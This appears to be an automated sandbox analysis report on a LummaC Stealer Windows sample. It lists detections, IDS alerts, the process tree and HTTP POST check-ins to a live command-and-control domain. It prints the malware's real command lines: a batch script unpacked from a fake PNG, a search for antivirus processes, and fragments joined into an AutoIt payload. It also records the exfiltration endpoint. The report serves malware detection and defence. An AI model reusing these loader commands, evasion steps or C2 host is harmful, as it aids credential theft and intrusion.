Edit tour

Windows Analysis Report
#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Overview

General Information

Sample name:	#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe renamed because original name is a hash value
Original sample name:	.exe
Analysis ID:	1631822
MD5:	b0ea3bcb6a802deb7952ee8bd7780707
SHA1:	6c816f5f444e2ce559b918693cfe3ef1bed1f5fd
SHA256:	e9919bf4c4c4420a88ae9ff7527b62047b785644a08c6a3bf9d6d9523e0d5f7e
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Sigma detected: Search for Antivirus process

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Classification

Process Tree

System is w10x64

#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe" MD5: B0EA3BCB6A802DEB7952EE8BD7780707)

cmd.exe (PID: 7748 cmdline: "C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

expand.exe (PID: 7796 cmdline: expand Labeled.png Labeled.png.bat MD5: 544B0DBFF3F393BCE8BB9D815F532D51)

tasklist.exe (PID: 7824 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

conhost.exe (PID: 7832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

findstr.exe (PID: 7832 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7872 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7880 cmdline: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7964 cmdline: cmd /c md 362398 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 7980 cmdline: extrac32 /Y /E Peterson.png MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 8076 cmdline: findstr /V "loops" Lost MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 8096 cmdline: cmd /c copy /b 362398\Print.com + Pounds + Lyrics + Msg + Blvd + Inserted + Comparison + Machinery + Olympus + Isaac + Withdrawal 362398\Print.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 8144 cmdline: cmd /c copy /b ..\Based.png + ..\Facilities.png + ..\Christopher.png + ..\Page.png + ..\Trailers.png + ..\Seminars.png + ..\Sims.png t MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Print.com (PID: 8160 cmdline: Print.com t MD5: 62D09F076E6E0240548C2F837536A46A)

choice.exe (PID: 7268 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

cleanup

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Search for Antivirus process

Source: Process started

Author: Joe Security: Data: Command: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7748, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth" , ProcessId: 7880, ProcessName: findstr.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:24:15.371437+0100	2028371	3	Unknown Traffic	192.168.2.4	49719	104.21.89.159	443	TCP
2025-03-07T16:24:17.422345+0100	2028371	3	Unknown Traffic	192.168.2.4	49720	104.21.89.159	443	TCP
2025-03-07T16:24:19.857719+0100	2028371	3	Unknown Traffic	192.168.2.4	49721	104.21.89.159	443	TCP
2025-03-07T16:24:22.210499+0100	2028371	3	Unknown Traffic	192.168.2.4	49722	104.21.89.159	443	TCP
2025-03-07T16:24:24.421841+0100	2028371	3	Unknown Traffic	192.168.2.4	49723	104.21.89.159	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:24:15.836285+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49719	104.21.89.159	443	TCP
2025-03-07T16:24:17.880813+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49720	104.21.89.159	443	TCP
2025-03-07T16:24:24.880523+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49723	104.21.89.159	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:24:15.836285+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49719	104.21.89.159	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T16:24:20.311677+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49721	104.21.89.159	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://techworld2025.top/api

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Virustotal: Detection: 17%			Perma Link
Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	ReversingLabs: Detection: 21%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.7% probability

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49723 version: TLS 1.2

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\362398	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\362398\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49723 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49721 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49719 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49719 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49720 -> 104.21.89.159:443

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49723 -> 104.21.89.159:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49722 -> 104.21.89.159:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: techworld2025.top
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: techworld2025.top
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NO4F3NDEM6G3XCookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2543Host: techworld2025.top
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KBOPYHTP9Q114W12QCookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1091Host: techworld2025.top
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=Kd47GW8O1FMBCdeIeQMRRgwGfPe8c0AD2Ju.1EOYTxQ-1741361055.6345649-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: techworld2025.top

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: kWEfhpXkjDIXt.kWEfhpXkjDIXt
Source: global traffic	DNS traffic detected: DNS query: techworld2025.top

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: techworld2025.top

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:24:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 91cb1945b9ed78e8-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:24:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uxzZe%2BEFkyQaMyAbsMxrUyuDaUuv8OWgAwx3JLepyCVChq%2FhRSTIacd%2Bi%2BmXdvXJekeGwSptQ06UV084reWCQWXv6BGtuZG2XUJJ1VVvZ7NOdU9jS%2Bvav6%2FQvTMTQGvnNIFXsQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb1952990cef9d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:24:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ap1rHGx16Ok7kZqTVMYh3gLxGQaktPc8zZoOFs7eHMfc1teRGUxFeqViSHRP%2BjvWRbNwJ7Gmkm7ohYVMit51b5SxwH6WvKUgTaDWg%2FuYmlMasr8D%2F%2FNNmQBydkNVpaYNOFNuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb19613cb3da8d-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:24:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHt4EIs%2B1WIeYqoKpzHRUMFdgnnEnOJgAdwhGCekE8cfQgiiWcsdINtvhuGZNbPwu4skWj6DoH83hu1ohlIWROwqIh8jdfIeuWewYDi9rB49DUywOHFOOs6%2FWxIIwMvAGFS%2Buw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb196fe888c4fb-EWR
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 07 Mar 2025 15:24:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rcjs%2FSr0MDl7%2BWdZ0DgANDlFGIjboHWwrk1ipmQ5KLGkAaucYbyNJQ%2B%2B3vPTv3xTKJ7dTiptmNYqL1mgLM6Pltb4nxiPPGlGkZ4bcJzVuWQzaF8QnFtEp%2FaG5TmJ0nYVqmvgkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91cb197e5d6f1526-EWR

Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Print.com, 00000011.00000000.1269854515.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp, Isaac.10.dr, Print.com.2.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: Print.com.2.dr, Withdrawal.10.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Withdrawal.10.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.89.159:443 -> 192.168.2.4:49723 version: TLS 1.2

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050CD

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044A5

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,

0_2_00403883

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\NovemberHandbook	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\SomethingOman	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\TamilApplicable	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\RelationshipRanging	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\SpareSaints	Jump to behavior
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	File created: C:\Windows\BoxOrgy	Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_0040497C	0_2_0040497C
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_00406ED2	0_2_00406ED2
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Code function: 0_2_004074BB	0_2_004074BB

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\362398\Print.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: String function: 004062A3 appears 58 times

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: Section: .reloc ZLIB complexity 1.002685546875

Source: classification engine

Classification label: mal100.troj.evad.winEXE@29/24@2/1

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

0_2_004044A5

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Code function: 0_2_004024FB CoCreateInstance,

0_2_004024FB

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7756:120:WilError_03

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

File created: C:\Users\user\AppData\Local\Temp\nswED52.tmp

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Virustotal: Detection: 17%
Source: #Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

File read: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe"
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude5a#Ud835#Ude69#Ud835#Ude6a#Ud835#Ude65.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c expand Labeled.png Labeled.png.bat & Labeled.png.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\expand.exe expand Labeled.png Labeled.png.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
